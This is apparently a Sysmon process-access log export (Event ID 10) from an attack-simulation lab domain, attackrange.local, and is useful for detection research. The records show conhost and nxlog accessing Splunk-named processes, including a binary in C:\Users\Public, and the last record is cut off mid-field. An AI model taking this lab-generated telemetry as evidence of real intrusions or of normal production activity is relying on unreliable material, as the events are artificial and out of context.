{"EventTime":"2020-08-01 06:57:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6457,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:01.964\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-123D-5F25-0000-001001400900}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:01.964","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-123D-5F25-0000-001001400900}","TargetProcessId":"4908","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6458,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:02.543\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:02.543","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6459,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:03.543\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:03.543","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6460,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:04.543\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:04.543","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6461,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:05.543\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:05.543","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6462,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:06.543\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:06.543","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6463,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:07.543\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:07.543","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 